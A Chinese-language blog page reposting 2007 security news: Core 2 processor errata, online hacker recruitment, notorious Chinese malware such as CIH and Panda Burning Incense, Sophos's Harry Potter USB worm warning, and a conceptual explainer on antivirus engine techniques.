目前分類:網路攻擊與資安威脅 (379)

瀏覽方式: 標題列表 簡短摘要

http://news.ccidnet.com/art/1032/20070702/1130523_1.html&cid=1114129665&ei=L66IRqS5KaPkqQPJjZSgCQ
Linux
之父:酷睿2漏洞無關緊要 無需恐慌 

發佈時間:2007.07.02 08:14     來源:賽迪網    作者:友亞

 【賽迪網訊】72日消息,據國外媒體報導,Linux之父李納斯·托沃茲(Linus Torvalds)日前表示,英特爾酷睿2處理器的漏洞根本就是無關緊要的,人們無需擔心。

在此之前,OpenBSD創始人希歐·德拉特(Theo de Raadt)曾引用英特爾公佈的處理器說明文件表示,英特爾酷睿2Core 2)存在大量潛在嚴重安全性漏洞,而英特爾並未提供足夠的資訊讓開發人員來評估和解決這些問題。

德拉特還稱:“這些漏洞是非常可怕的,有些可被利用來發動攻擊。”對此,Linux之父、前全美達雇員李納斯·托沃茲則認為,這些漏洞完全是無關緊要的。處理器存在一些小問題根本不是什麼新鮮事兒。與此前的產品相比,酷睿2架構的漏洞已經是很少了。

而英特爾發言人Nick Knuppfer在一份聲明中稱:“幾個月前,我們發佈了一款BIOS更新,解決了一個處理器問題。今年4月份,我們將其寫進了勘誤表內。長期以來,英特爾一直通過這種形式來通知消費者。請大家放心,遇到這些問題的可能性很小。”(責任編輯:胡祥寶)

jason0936 發表在 痞客邦 留言(0) 人氣()

趁暑期網上開班收徒 專門教授黑網站盜QQ

http://www.rednet.cn  2007-7-2 9:08:04  紅網 

  一駭客在論壇發表的招收徒弟的帖子

  “收徒弟,誠心學的先看後學,活動期間送會員+鑽:免費提供軟體,另有各個黑網站vip軟體,專業承接各種DDOS網路攻擊業務。

學會必技術與利益雙豐收……”記者在百度貼吧等多家IT論壇上看到,關於“駭客收徒培訓”的帖子比比皆是,而誠心拜師學藝的人更是大有人在。

  暑期將至,每年的這個時期都是學生們最為放鬆的日子,而每年這個時期也是病毒最為倡狂的時期。也正是這段充裕悠閒的時間,使得許多對電腦有著濃厚興趣的人,難以抵制前述一類“收徒”帖的誘惑,開始了自己的“駭客之旅”。 

  記者在眾多“駭客收徒”發帖中看到,多數駭客都在極盡所能地標榜,通過向自己學習能牟取種種利益。僅有1位駭客聲明不會教授黑網站、盜QQ號及遊戲帳號、刷Q幣等。並稱N多人認為會盜Q號、入侵幾家網站就叫駭客,我的回答是NO。我個人認為駭客是知識很廣,如:程式設計、網路、腳本、系統、命令等。  

  我國電腦反病毒第一人、江民科技董事長王江民在接受記者採訪時指出,正是網路的開放性與匿名性,在滿足了人們溝通、娛樂需求的同時,也給人們帶來了不少負面的影響。目前,青少年利用駭客技術編寫電腦病毒,實施網路攻擊的行為已經十分嚴重。據相關調查顯示,病毒製作者的年齡也在逐年減小,越來越多的初、高中生和大學生加入到了製作和傳播電腦病毒的隊伍。這也使得網路犯罪日益倡狂,嚴重影響了互聯網的安全。

  一位受訪的業內技術專家告誡道:“鑽研電腦技術一定要走正路,廣大青少年應該樹立良好的價值觀,把自己的聰明才智用到為社會創造價值上來,不要盲目地崇拜和追捧網路駭客,更不要為一時的負氣而做出讓自己終身後悔的事。”

[稿源:北京娛樂信報]

jason0936 發表在 痞客邦 留言(0) 人氣()

中國 細數古今病毒木馬之“四大惡人”

出處: 網路世界     作者: 佚名      2007-06-29 09:30   

 商用電腦就幾乎沒有輕重之分了,一台電腦感染了病毒之後會致使公司整個網路內的電腦被傳染,公司的運作會陷入癱瘓,公司的機密研究成果或資金都有可能被破壞和盜取。

  家用電腦中毒,輕則會使得個人的資訊和資料丟失、工作的心血付之東流;重則會使個人隱私和銀行帳號等機密資訊被洩露和竊取。商用電腦就幾乎沒有輕重之分了,一台電腦感染了病毒之後會致使公司整個網路內的電腦被傳染,公司的運作會陷入癱瘓,公司的機密研究成果或資金都有可能被破壞和盜取。

   

臭名昭著“史上第一惡人CIH病毒”

  電腦病毒其實很早就出現了,不過當初的它們只是作者寫出的一些錯誤邏輯運算罷了,還沒有被重視起來,可第一次讓人們見識到並且開始意識到這種東西會對個人電腦有如此大的殺傷力,那就非CIH莫屬了。

   CIH病毒傳播的主要途徑是Internet和電子郵件,當然隨著時間的推移,它也會通過軟碟或光碟的交流傳播。據悉,權威病毒搜集網目前報導的CIH病毒,“原體”加“變種”一共有五種之多,相互之間主要區別在於“原體”會使受感染檔增長,但不具破壞力;而“變種”不但使受感染的檔增長,同時還有很強的破壞性,特別是有一種“變種”,每月26日都會發作。

   CIH病毒只感染Windows 95/98作業系統,從目前分析來看,它對DOS作業系統似乎還沒有什麼影響,所以,對於僅使用DOS的使用者來說,這種病毒似乎並沒有什麼影響,但如果是Windows 95/98用戶就要特別注意了。正是因為CIH獨特地使用了VxD技術,使得這種病毒在Windows環境下傳播的即時性和隱蔽性都特別強,使用一般反病毒軟體很難發現這種病毒在系統中的傳播。

   CIH病毒“變種”在每年426(有一種變種是每月26)都會發作。發作時硬碟一直轉個不停,所有資料都被破壞,硬碟分區資訊也將丟失。CIH病毒發作後,就只有對硬碟進行重新分區了。再有就是CIH病毒發作時也可能會破壞某些類型主機板的電壓,改寫唯讀記憶體的BIOS,被破壞的主機板只能送回原廠修理,重新燒入BIOS

   CIH可利用所有可能的途徑進行傳播:軟碟、CD-ROMInternetFTP下載、電子郵件等。被公認為是有史以來最危險、破壞力最強的電腦病毒之一。19986月爆發於中國臺灣,在全球範圍內造成了2000-8000萬美元的損失。

 
  

後門病毒老大“灰鴿子”

   木馬程式的出現讓我們對於互聯網的不安全感又加劇了,好像自己正在使用的電腦就像完全沒有上鎖的屋子一樣,駭客們們可以肆意的進進出出。“灰鴿子”是一個肆虐在網上多年的木馬程式。其特徵為:駭客可以通過此後門遠端控制被感染的電腦,在使用者毫無察覺的情況下,任意操控用戶的電腦,盜取網路遊戲密碼、銀行帳號、個人隱私郵件、甚至機密文件等。入侵者在滿足自身目的之後,可自行刪除灰鴿子檔,受害者根本無法察覺。

   “灰鴿子”自2001年誕生之後2004年、2005年、2006年連續三年被國內殺毒軟體廠商列入10大病毒,甚至有些年度位居“毒王”。它的真正可怕之處是擁有“合法”的外衣,其可以在網路上買到,任何有一定電腦知識的人都可以將其利用和改造。

   一些網路論壇上,以數十元的價格出售灰鴿副程式的人不在少數,更有人提供灰鴿子教程,教別人如何使用這一程式來侵入別人的電腦、盜取資料。利用灰鴿子木馬最常做的三件事是盜取QQ密碼、偷遊戲帳號、出售給流氓軟體點擊國外的廣告(每點擊一次可以賺0.3美元),由於可以“全民參與”,這個病毒的危害性比其他病毒大。目前灰鴿子已形成一個上百萬人參與的完整產業鏈,又因其具有極強的隱蔽性而不易察覺,危害性更大。”

 
MADE IN CHINA,武漢男孩指使熊貓燒香

   2007年,熊貓燒香成了網上最熱門的詞彙,原因就是這個化名叫武漢男孩的李俊製作的蠕蟲病毒,不但它的危害大傳染速度快,而且還在於他用了咱們的國寶大熊貓為他的病毒做“代言人”,真是人神共憤呀。

   “熊貓燒香”是一個由Delphi工具編寫的蠕蟲,終止大量的反病毒軟體和防火牆軟體進程。病毒會刪除副檔名為gho的檔,使使用者無法使用ghost軟體恢復作業系統。“熊貓燒香”感染的.exe.com.pif.src.html.asp檔,添加病毒網址,導致使用者一打開這些網頁檔,IE就會自動連接到指定的病毒網址中下載病毒。

   在硬碟各個分區下生成檔autorun.infsetup.exe,可以通過U盤和移動硬碟等方式進行傳播,並且利用Windows系統的自動播放功能來運行,搜索硬碟中的.exe可執行檔並感染,感染後的檔圖示變成“熊貓燒香”圖案。“熊貓燒香”還可以通過共用資料夾、系統弱口令等多種方式進行傳播。據國內的病毒專家介紹,“熊貓燒香”蠕蟲不但對使用者系統進行破壞,導致大量應用軟體無法使用,而且還可刪除副檔名為gho的所有檔,造成使用者的系統備份檔案丟失,從而無法進行系統恢復。此外,該病毒還能終止大量反病毒軟體進程,大大降低使用者系統的安全性。

   據瑞星反病毒專家介紹,“熊貓燒香”其實是“尼姆亞”病毒的新變種,最早出現在2006年的11月。由於它一直在不停地進行變種,而且該病毒會在中毒電腦中所有的網頁檔案結尾部添加病毒代碼,因此,一旦一些網站編輯人員的電腦被該病毒感染,網站編輯在上傳網頁到網站後,就會導致所有流覽該網頁的電腦使用者也被感染上該病毒。

   最可笑的是這個作者為了顯示自己能力,還在病毒代碼中與反病毒的網友和專家進行“對話”,並且在每次發佈新變種時,代碼中的留言都會改變,如此幼稚的做法確實讓人覺得可氣又可笑。

 
  橫空出世,無法無天的“帕蟲”

   目前最火的明星就要數“帕蟲”了,它的橫空出世打了大家一個措手不及,一方面是因為它的威力很強,還有一方面是網友們沒有做好病毒如此猛烈和密集的出擊,才剛送走了熊貓燒香卻又迎來了“帕蟲”,這多少讓廣大網友有些吃不消。

   “帕蟲”的特徵為:病毒運行後,會產生一個由數位和字母隨機組成的8位元名稱的病毒進程,並且嘗試關閉多款殺毒軟體、防火牆和安全工具進程,使殺毒操作極其困難。截止到本月中旬,其變種數已達500多個,波及人群超過10萬人。普通使用者一旦感染該病毒,從病毒進入電腦,到實施破壞,四步就可導致用戶電腦徹底崩潰:

   1.禁用所有殺毒軟體及相關安全工具,讓電腦失去安全保障;
 
  
2.破壞安全模式,致使使用者根本無法進入安全模式清除病毒;
  
3.強行關閉帶有病毒字樣的網頁,只要在網頁中輸入“病毒”相關字樣,網頁遂被強行關閉,即使是一些安全論壇也無法登錄,使用者無法通過網路尋求解決辦法;
  
4.格式化系統磁片重裝後很容易被再次感染。

  此外,經過“帕蟲”的精心“策劃”,用戶電腦的安全防禦體系被徹底摧毀,安全性幾乎為零,而“帕蟲”並未就此罷手,自動連接到擁有病毒的網站,並自動下載數百種木馬病毒,各類盜號木馬、廣告木馬、風險程式使用者電腦毫無抵抗力的情況下,魚貫而來,用戶的網銀、網遊、QQ帳號密碼以及機密檔都處於極度危險之中。因此提醒電腦用戶目前使用電腦需慎之又慎。

  關聯資訊顯示:“該病毒採用了多種技術手段來保護自身不被清除,例如,它會終結幾十種常用的殺毒軟體,如果使用者使用google、百度等搜尋引擎搜索‘病毒’,流覽器也會被病毒強制關閉,使得使用者無法取得相關資訊。尤為惡劣的是,該病毒還採用了IFEO劫持(windows檔映射劫持)技術,修改註冊表,使QQ醫生、360安全衛士等幾十種常用軟體無法正常運行,從而使得使用者很難手工清除該病毒。

jason0936 發表在 痞客邦 留言(0) 人氣()

http://www.sophos.com/pressoffice/news/articles/2007/06/hairy.html

sophos報導哈利波特大結局問題,通知
傳說收到哈利波特最後一集的電子郵件,就能看到精彩結局,別再相信沒有根據的說法了,因為您將會受到蠕蟲感染。  

這波由USB儲存裝置蔓延的W32/Hairy-A 蠕蟲,是以微軟文件方式讓人開心的傳遞HarryPotter-TheDeathlyHallows.doc ,還告訴你哈利波特死了(夠悲傷吧),但是這蠕蟲馬上讓哈利波特主角全部讓你看到(夠開心吧)。

妳或許好奇他們怎出現,他們會一個一個出現在妳本機使用者,您將會多一堆帳號Harry Potter (哈利波特), Hermione Granger(妙麗格蘭傑) Ron Weasley(榮恩衛斯理),在登陸他們帳號後,魔法就開始發生了(該說是惡夢)出現文字模式,裡面還寫要JK Rowling 下地獄 被燒死,並且變更網頁起始頁,到假冒的亞瑪遜書局網站。還真是一團混亂,所以請大家別亂點沒有根據的信件了。

 

Hairy Harry Potter worm targets USB memory drives Hackers exploit Potter-mania around the globe as they claim teenage wizard is dead

With just weeks remaining until the release of the last ever Harry Potter novel, and the imminent premiere of the fifth movie in the franchise, Sophos has warned of a new computer worm exploiting Potter-mania around the world.

The W32/Hairy-A worm spreads by copying itself onto USB memory sticks, posing as a copy of the eagerly-anticipated novel "Harry Potter and the Deathly Hallows".

Windows users who allow affected flash drives to 'autorun' are automatically infected by the worm when it is attached to their PC. A file called

HarryPotter-TheDeathlyHallows.doc

can be found in the root directory of infected USB drives. Inside the Word document file is the simple phrase "Harry Potter is dead."

After infecting Windows computers, the worm creates a number of new users - namely the main characters from JK Rowling's celebrated series of books about student wizards: Harry Potter, Hermione Granger and Ron Weasley.

After logging in, users are shown the following message via a batch file:

read and repent

the end is near
repent from your evil ways O Ye folks
lest you burn in hell...JK Rowling especially

In addition, everytime infected users open Internet Explorer they will find their start page has been redirected to an Amazon.com web page selling a spoof book entitled "Harry Putter and the Chamber of Cheesecakes".

"Much of the world is waiting with bated breath for the final Harry Potter novel, and the premiere of the new movie is looming too. There is a real danger that muggles will blindly allow their USB flash drives to auto-run and become infected by this worm," said Graham Cluley, senior technology consultant for Sophos. "Using such social engineering at this time is a trick dastardly enough for Lord Voldemort himself."

Read more about this worm on the SophosLabs blog

"Seriously, the fact that this worm has been inspired by the tales of a fictional schoolboy wizard doesn't make it a harmless prank," continued Cluley. "A worm like this which infects and tampers with users' computers without their permission is committing a criminal act. Someone needs to get a little more sunshine in their diet and put their energies into a more positive pursuit than writing malicious code like this."

Recently experts at SophosLabs™, Sophos's global network of malware and spam analysis centers, have reported an increasing trend for malware authors to spread via USB devices.

Sophos recommends companies protect themselves with a consolidated solution which can defend against the threats of viruses, spyware, spam and hackers.

 

jason0936 發表在 痞客邦 留言(0) 人氣()

http://article.pchome.net/content-390771.html&cid=1113975513&ei=v9SBRtm-FY6WrgOJhJnBBw

安全知識:殺毒軟體引擎技術之窺探

CNET中國·PChome.net   類型:轉載   作者:   責編:楊劍鋒   時間:2007-06-27

. 群雄逐鹿的殺毒軟體市場

學校機房新購入了一批電腦,負責安裝應用程式的李老師在殺毒軟體的選擇上犯了難,由於機房環境的複雜,如果不安裝殺毒軟體,勢必會因為使用者帶來運行的媒體介質感染了病毒而造成系統癱瘓或交叉感染,無論出現哪種情況都會影響上課進度和效率;但是,如果安裝的殺毒軟體功能不夠強大,無法及時更新資料,一樣不能防止病毒造成破壞。李老師考慮再三,還是決定來到電腦市場購買正版殺毒軟體,但是面對市場上眾多品牌的殺毒軟體,他又犯了難:瑞星、金山、江民、Norton、趨勢、熊貓、卡巴斯基、McAfee……每一款殺毒產品都具備它自己的優缺點和特色,我該選擇哪一種呢?

. 從病毒原理說開去

病毒的定義和行為特徵

在這個年代裡,電腦病毒(Computer Virus)已經是家喻戶曉的名詞了,而其在業界裡也早已有了定義:電腦病毒是指編制或者在電腦程式中插入的破壞電腦功能或者毀壞資料影響電腦使用,並能夠自我複製的一組電腦指令或者程式碼,它可以是一個程式,一段執行代碼,像生物病毒一樣有獨特的複製能力,可以很快蔓延。他們能把自身附著在各種類型的檔上,隨檔的傳播而蔓延。現在隨著電腦網路的發展,病毒和網路技術結合,蔓延的速度更加迅速。電腦病毒具有可執行性、寄生性、傳染性、破壞性、欺騙性、隱蔽性、潛伏性、衍生性。

以上便是早期就已經定義好的電腦病毒概念,而如今可稱為病毒的,還有各種不會感染檔的特洛伊木馬程式(後門)等(TrojanBackDoor),大部分特洛伊木馬除了不具備對文件的傳染性以外,其他特徵均與病毒符合,而且一部分檔型特洛伊木馬還可感染檔。此外,還有一種通過系統漏洞進行傳播的惡意程式或“蠕蟲”(Worm),利用系統自帶的指令碼語言功能實現破壞效果的巨集病毒和惡意腳本(Macro VirusEvil Script),因此,文中將把木馬後門、蠕蟲、巨集病毒和傳統檔型病毒等統稱為“病毒”。

自我複製
病毒的基本動作是複製自身,檔型病毒會把自身插入正常程式檔內部以便程式每次執行時連病毒代碼也一併執行,惡意程式或木馬後門會將自身複製到系統目錄,然後通過多種途徑令系統在啟動時執行病毒體檔,但是無論是哪種病毒的複製行為,其最終目的都只有一個:潛伏到使用者電腦內,伺機執行各種危害操作。

病毒在執行複製行為時必須隱蔽,否則它會輕易被稍有經驗的用戶發現,因此不同的病毒都會採取各種手段來實現其隱蔽目的,但是無論它們的表現形式如何,最終都可歸納為兩種形式:寄生和欺騙。

寄生
這是檔型病毒的傳播方式,檔型病毒的成品一般沒有自己的獨立程式體,它們通過受感染的可執行檔進行傳播。當使用者執行一個感染了檔型病毒的程式時,由於原程式的執行入口已經被破壞,因此病毒代碼會首先得到執行,將自身載入記憶體中,成為一個“駐留程序”(TSR),根據病毒作者的破壞性差異,病毒可能僅僅停留在記憶體空間裡等待使用者執行程式時進行感染操作,也可能會主動出擊,搜索使用者電腦上符合感染條件的可執行檔進行感染。

較普通的檔型病毒會將自身代碼放置到受感染檔的頭部或尾部,而後修改檔頭部的執行入口指向自身代碼起始段,以達到自身先於受感染程式執行的目的,當病毒在入記憶體後,才會去調用受感染檔的真正執行入口,讓受感染檔能夠運行,這樣用戶才不會起疑心。在早期的感染模式裡,檔型病毒通常會主動搜索感染可執行檔,甚至因為感染失敗而導致檔損壞的事情也常有發生,而自從微軟在Windows 2000開始引入“系統檔校驗”技術後,主動搜索可執行檔進行感染的病毒寄生技術便因為導致系統不斷出現“系統檔遭遇替換”的警告而逐漸退出舞臺,繼而換成守株待兔類型的等待程式執行後進行感染的被動寄生方式。較新的檔型病毒還會採取不感染系統檔的政策,讓用戶無論如何都難以發現檔被感染的痕跡。

但是直接把自身簡單的插入檔首尾的寄生方式會導致檔體積和修改日期的變化,因此高級的病毒會自動根據目的檔案內部的“無用”空間分配情況來將自身代碼分段插入檔體內,並修改檔日期為原始日期,如此一來便加大了檢測和查殺的難度。這一技術得以實現的原因是PE規範的特點:PE檔的每個節之間留有按簇大小對齊後的空洞,病毒體如果足夠小則可以將自身分成幾份並分別插入到每個節最後的空隙中,這樣就不必額外增加一個節,因而檔大小保持不變,能做到這種形式的病毒體積必須十分小巧,否則它會把檔破壞掉的。當檔被執行時,病毒通過初始化代碼的複雜計算將自身全部代碼恢復連貫載入記憶體,繼續完成下一次感染過程。

欺騙
並非所有病毒(注意此文的“病毒”所指範圍)都是檔型的,例如特洛伊木馬、蠕蟲和惡意程式等,那麼它們如何將自身隱蔽呢?這就要用到欺騙了。所謂欺騙,就是利用各種手段將自身執行檔植入系統,而不被使用者輕易察覺,即使被發現,也難以判斷真偽或者無法徹底刪除,從最初的簡單設置檔案屬性為隱藏,到現在的偽裝系統核心檔、DLL形式,甚至驅動程式類型的隱藏,病毒技術的不斷發展使得手工查殺增加了難度。

破壞
一個程式是否具備破壞性是衡量它是否屬於病毒的一個重要標準,病毒的破壞是多種多樣的,其實在它們進行寄生或欺騙操作時就已經對被感染的檔、以及受害電腦的環境完整性形成一定的破壞了,由於病毒需要駐留記憶體進行感染操作,直接導致的影響就是磁片讀寫增加,電腦回應遲鈍,更有甚者為了取得最高的回應速度,而修改系統正常的優先順序設置讓自己達到最高等級,從而導致系統效率嚴重下降。然而這還不是真正可怕的,當病毒發作時,可能會破壞你的檔檔案,或者敞開電腦大門讓入侵者隨意進出,甚至通過特殊的軟體讀寫達到破壞電腦硬體的目的。

. 剖析殺毒軟體的心臟——引擎技術

病毒和反病毒產品是天生的冤家,由於病毒永無休止的存在,反病毒產品這片領域自然也會出現眾多廠商來分割的局面,因此也就銜生出了多種殺毒引擎技術。

殺毒引擎是決定一款殺毒軟體技術是否成熟可靠的關鍵,什麼是殺毒引擎呢?簡言之,它就是一套判斷特定程式列為是否為病毒程式或可疑程式的技術機制,引擎不僅需要具備判斷病毒的能力,還必須擁有足夠的病毒清理技術和環境恢復技術,如果一款殺毒產品能查出病毒但是卻無法清除、或者無法將被病毒破壞的系統環境成功恢復,那它也只能是雞肋。為了達到查殺病毒的目的,殺毒引擎自身要實施的行為就要比病毒還病毒。

例如,為了及時獲得環境變動的監控資料,一些殺毒引擎採用DLL的鉤子技術將自身注入系統進程中,這一行為和DLL木馬無異;而為了成功攔截查殺驅動級別木馬Rootkit,殺毒引擎更需要將自身的一部分作為驅動形式運行,以便進入系統內核領域……說到這裡,一些電腦配置較低的使用者應該能明白,為什麼自己安裝殺毒軟體後電腦速度明顯變慢了,這多半是因為殺毒軟體的“檔監控”等功能導致的,因為這一功能的實現原理就如檔型病毒的寄生過程一樣,只不過檔型病毒是守候在記憶體中伺機感染每一個打開的檔,而“檔監控”功能是時刻駐守在記憶體裡檢查每一個打開的檔是否存在病毒,兩者導致的後果都是程式載入記憶體的時間增加,在低配置的電腦表現得比較明顯罷了。

由於以上提到的原因,殺毒軟體是會不可避免的對使用者電腦運行速度造成一定影響的,但是為了安全,大部分用戶只能犧牲一點工作效率來換取安全了,那麼,殺毒引擎的具體實現過程又是如何呢?且讓我們來對其窺探一番。

1.守住每一個關卡——程式列為捕獲

每個程式運行時都需要進行各種交互動作,如收發網路資料、回應某個觸發事件、檔讀寫操作等,這些交互都被稱為“行為”(Action),這個週期過程是可以被跟蹤記錄的,這就是殺毒引擎必須干涉的第一步,當殺毒軟體的環境監視模組啟動後,它會嵌入系統的操作介面,使得任何非核心程式和除了殺毒軟體自身程式的運作過程都要被它即時監視,這一技術通常通過鉤子技術和驅動層掛載實現,每個殺毒軟體廠商都預先定義了一套病毒行為判斷規範,即在一個給定的範圍和置信度下,判斷相關操作是否為合法。例如一個代碼執行後被發現試圖將自己寫入使用者請求執行的程式檔體內、或進行特定的複製動作和添加註冊表操作,則可將其懷疑為病毒,移交給查毒過程的第二步進一步判斷處理。

為了實現行為捕獲操作,殺毒軟體引擎必須將自身模組嵌入系統底層,在這個實現方法上,各大廠商都有自己的一套方案,一般廠商普遍採用的是中介軟體技術,即通過Hook掛鉤方式實現對每個進程的訪問,這種方案通過在系統底層與應用程式之間嵌入一個全域鉤子DLL模組達到目的,從嚴格上來說,它的相對安全和穩定性較低,但是在原始程式碼不開放的作業系統層面上,這是最簡單的方法。

一部分廠商因為與作業系統廠商存在合作關係,因而獲得了較其他廠商殺毒產品要高的作業系統特權,所以他們採用的方案是基於系統最底層的系統核心驅動,這種實現方式是最安全的,或者說最高級的實現方式,至今只有Norton獲得了這個特權。隨著病毒技術逐漸滲透到Rootkit層次,過去的Hook技術逐漸有點力不從心,於是殺毒廠商開始轉入驅動方案,當然,由於沒有作業系統廠商的授權,他們並無法實現最底層的核心驅動解決方案,於是殺毒廠商編寫了一個稱為“軟體驅動”的中介軟體,用於在系統中產生一個虛擬硬體。

眾所周知,在作業系統中,只有驅動模組能通過一個“硬體抽象層(HAL)”的通訊介面而到達系統底層,如今流行的Rootkit木馬也是採用驅動形式進入系統核心的,因此殺毒廠商使用“軟體驅動”來實現底層監視的方案是要比一般的Hook技術效果顯著的,但是這也不可避免會出現一些問題,如果這個“軟體驅動”存在缺陷或者被某些程式異常終止(例如出現未預料的錯誤),在系統底層無任何保護措施的環境下,最直接的一個後果就是系統藍屏崩潰,造成可能的損失。

引用(小知識:系統的幾個“層”)

作業系統作為一個複雜的運作體系,其內部是必須實現一定的功能模組來進行分工合作的,這些功能模組像金字塔一樣層層堆積,形成了系統的幾個“層”,分別是系統核心層、硬體抽象層、使用者層。

系統核心層(Kernel Layer)位於整個作業系統的最底層,負責系統的基本運作,在這一層裡的所有行為都由系統內置的指令來實現,所有外界因素都不會對這一處的行為造成影響。能直接進入這個層交互的程式不多,除了作業系統自身,協力廠商廠商若要能在此層直接工作,必須和系統廠商建立合作關係,使用系統廠商提供的介面函數才能進入。目前能在這個層面直接工作的殺毒軟體只有賽門鐵克的Norton AntiVirus

硬體抽象層(Hardware Abstraction Layer)是美國微軟公司為了便於作業系統在不同硬體結構上進行移植而提出的將系統底層與硬體相關的部分獨立運作的思想,HAL為系統實現了“硬體無關性”,即在不同的硬體平臺上,硬體與作業系統的交互也不會有所差異。

這樣一來,硬體廠商開發驅動的難度便能大大降低,HAL將硬體的介面細節隱藏起來,並為作業系統提供一個標準硬體交互介面,目前所有的硬體驅動都工作在這個層面上,當外界硬體存在指令請求時,驅動程式回應請求並將指令通過HAL轉換為系統核心層能理解的指令交給內核執行,如果未找到相應的驅動程式類型,則將其視為“預設硬體”(Default Hardware)處理,什麼叫“預設硬體”呢?最簡單的例子就是進入安全模式,這時候大部分驅動程式不會被載入,此時的系統便是工作於“預設硬體”上。大部分使用“軟體驅動”解決方案的殺毒軟體就是在HAL層上虛擬了一個硬體來達到與核心層交互的效果,如McAfee、卡巴斯基等,瑞星2006也是通過這個方案實現了內核交互。

用戶層(User Layer)就是平時我們直接看到的部分,例如桌面,大部分殺毒軟體也是在這一層運行的,主要用於使用者介面交互和將指令傳遞到殺毒引擎。一般運行於Ring3的程式列為也產生於此,一個應用程式產生的指令要求首先被傳遞到HAL層,HAL層將其解釋處理為核心層可以識別的指令串,然後提交給核心層最後進入cpu的指令處理迴圈,CPU處理完畢後將結果反向送回到使用者層上的應用程式,最終得到運算結果。

2.檢測的核心——基於引擎機制的規則判斷

這一步環節可以稱之為病毒判斷的核心階段,一個好的殺毒引擎能在這個階段識別出相當規模的病毒,其原理是在引擎中內置一部分病毒的特徵代碼,稱為“基於特徵碼的靜態掃描技術”,即殺毒引擎直接在檔中查找自身攜帶的特徵代碼,力求儘量在這一步發現病毒。早期的電腦使用者應該記得,當初的殺毒產品並沒有非常大的病毒碼資料庫,甚至KV300+的所謂病毒碼資料庫還是ASCII格式的,並由用戶自己手工加入,僅僅作為一種簡單的擴充手段來運作而已,這是因為KV300+的主程序內就已經包含了當時各種流行病毒的特徵碼。

但是如今由於網路普及和電腦技術發展,病毒攻勢鋪天蓋地而來,如果單純靠殺毒引擎自身攜帶病毒碼代碼,將會造成主程序體積過於龐大而無法高效率運行,且升級麻煩等難點,因而殺毒引擎不得不將病毒碼庫從自身脫離開來,形成獨立的病毒資料庫結構來與自身保持聯繫,這就是“基於特徵碼的靜態掃描技術”的擴展產物:病毒碼代碼資料庫。

3.在翰林辭典中穿梭——引擎與病毒碼庫的交互

由於上述原因,如今的殺毒軟體已經不得不採用外部資料庫連接的方法來達到識別病毒的效果,病毒碼代碼資料庫中以特定格式儲存了各種病毒的行為標識和靜態代碼,在工作時,殺毒引擎需要將捕獲到的程式列為轉換為它自身可以識別的行為標識和靜態代碼,然後進入病毒碼代碼資料庫中查詢並期待其返回查詢結果,因此這個步驟是整個殺毒過程中最慢的,但是不可否認,當前的殺毒軟體對大量病毒的識別都是在這個階段完成的。

因此一個足夠龐大的病毒庫往往能夠彌補殺毒引擎的不足之處,但是當今病毒越發複雜和繁多,如此長期以往,病毒碼庫將會有一天過於臃腫而導致不良後果,要解決這個問題,只能在核心技術上儘量實現將病毒檢測工作在第二步完成,只可惜在當前我們仍然沒有能夠實現這個想法的殺毒引擎技術,因此如今的殺毒軟體或多或少都依賴著一個幾十MB的病毒碼庫來維持工作,殺毒廠商在殺毒引擎核心未進行關鍵修改時發佈的病毒更新其實也就是為了往這個特徵資料庫中添加最新發現的病毒資料,以達到查殺新病毒的作用。

 “基於特徵碼的靜態掃描技術”的最大弱點在於它無法發現和查殺“未公開”或“未收錄”的病毒,由於它的大部分判斷依據來自病毒碼代碼資料庫,一旦使用者被感染了病毒中的“0day”或“私人後門”,殺毒軟體就無能為力,甚至落得個被病毒終結運行的下場,當然,由於殺毒軟體自身的校驗機制,一般不會有病毒愚蠢到去感染殺毒軟體,但是如果一個殺毒軟體被病毒終止了,它就無法對使用者的電腦實施病毒防護了,但是如何判斷阻止由病毒發出的關閉指令,而不影響使用者正常點擊殺毒軟體自身提供的“退出”功能,這也是個難題。

 一部分殺毒引擎會通過自身的病毒行為判斷規範來“懷疑”某些未收錄在資料庫中的程式為病毒,並詢問使用者需要什麼解決方案,一般情況下,殺毒軟體最折衷的預設解決方案是將被懷疑動機不純的程式檔改名備份到一個被稱為“隔離區”的資料夾中,然後將該原始檔銷毀。這樣做或許能達到查殺未知病毒的目的,但是我們也不能忽視其可能帶來的嚴重後果,例如某個關鍵文件或重要文檔感染了病毒,如果殺毒軟體不由分說就將其消滅,那就很可能引發系統崩潰甚至經濟損失,因為一個健全穩妥的查殺過程和環境恢復是很重要的。

4.月光寶盒——病毒查殺和系統環境恢復

當殺毒引擎檢測到病毒時,需要分為兩種情況對待,首先是尚未來得及進行感染或破壞行為的病毒,在這種情況下殺毒引擎只需要簡單刪除檔就可以了,但是日常操作中用戶面臨最多的還是已經被病毒實施感染破壞行為後的系統環境,在這種情況下,殺毒引擎必須在使用適當的方式查殺病毒後,根據病毒碼庫中記錄的病毒行為來智慧判斷當前系統環境遭受破壞的情況並進行恢復,例如對於受病毒感染的檔,殺毒引擎必須根據一定的演算法在檔體內找出病毒代碼寄生的部分並給予清除,這個過程必須非常謹慎,否則直接的後果就是導致原文件被破壞,這樣的殺毒就毫無意義了。

 而對於非檔型的木馬和惡意程式,由於它們會通過各種方式篡改系統登錄甚至系統檔來達到載入自身之目的,殺毒引擎在清除了這些病毒後能否準確有效的恢復受破壞的系統環境,就是對殺毒引擎的最大挑戰。病毒隱藏技術已經從最初的簡單載入單一啟動項,演化到今天的多重啟動項、進程互相保護、執行緒監視、遠端注射、可執行檔關聯、服務專案載入、驅動形式載入等方式,甚至採用多項結合的方法,使得查殺工作變得十分困難,甚至只要遺漏了一個檔未能清除,病毒便能捲土重來,因此,如何有效準確的判斷和修復受損環境,也是衡量殺毒引擎技術是否成熟的關鍵。

 
以上說的是殺毒引擎完整工作過程的原理,那麼,它所採取的技術有哪些呢?目前,主流的技術有兩種:虛擬機器技術、即時監控技術。除此之外,還有兩種最新的技術仍在試驗階段,分別是智慧碼標識技術和行為攔截技術。

 1.虛擬機器技術

一提起虛擬機器,部分讀者可能就會聯想到VMWare去了,然而這裡提到的虛擬機器並非如此。在反病毒界裡,虛擬機器也被稱為通用解密器,已經成為反病毒軟體中最重要的部分之一。殺毒引擎的虛擬機器技術並非是為病毒提供一套電腦模擬系統,讓其在內部折騰直到暴露出病毒行為特徵,在這裡的虛擬機器是指殺毒引擎類比出一個模擬CPU,這個“CPU”具備和真正CPU等同的指令分析功能,殺毒引擎將待檢測的程式碼讀入“CPU”中逐條指令迴圈執行,直到出現特定情況才結束工作,在這個過程中探知程式是否具備病毒行為特徵或者暴露出病毒碼碼。

